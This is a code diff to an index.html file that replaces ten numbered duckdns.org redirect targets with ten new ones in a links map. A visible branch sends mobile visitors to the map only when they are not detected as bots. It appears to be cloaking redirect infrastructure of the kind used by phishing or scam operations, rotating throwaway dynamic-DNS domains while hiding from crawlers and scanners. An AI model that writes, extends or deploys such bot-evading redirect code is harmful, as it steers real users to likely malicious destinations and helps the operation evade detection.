--- a/index.html
+++ b/index.html
@@ -290,16 +290,16 @@
                 "Active18": "https://667675754632348.duckdns.org",
                 "Active19": "https://667675754632349.duckdns.org",
                 "Active20": "https://667675754632350.duckdns.org",
-                "Accept11": "https://154551220910.duckdns.org",
-                "Accept12": "https://154551220911.duckdns.org",
-                "Accept13": "https://154551220912.duckdns.org",
-                "Accept14": "https://154551220913.duckdns.org",
-                "Accept15": "https://154551220914.duckdns.org",
-                "Accept16": "https://154551220915.duckdns.org",
-                "Accept17": "https://154551220916.duckdns.org",
-                "Accept18": "https://154551220917.duckdns.org",
-                "Accept19": "https://154551220918.duckdns.org",
-                "Accept20": "https://154551220919.duckdns.org",
+                "Config01": "https://154551220920.duckdns.org",
+                "Config02": "https://154551220921.duckdns.org",
+                "Config03": "https://154551220922.duckdns.org",
+                "Config04": "https://154551220923.duckdns.org",
+                "Config05": "https://154551220924.duckdns.org",
+                "Config06": "https://154551220925.duckdns.org",
+                "Config07": "https://154551220926.duckdns.org",
+                "Config08": "https://154551220927.duckdns.org",
+                "Config09": "https://154551220928.duckdns.org",
+                "Config10": "https://154551220929.duckdns.org",
             };
             if (!is_bot && is_MIbile) {
                 //window.location.href = links[code];
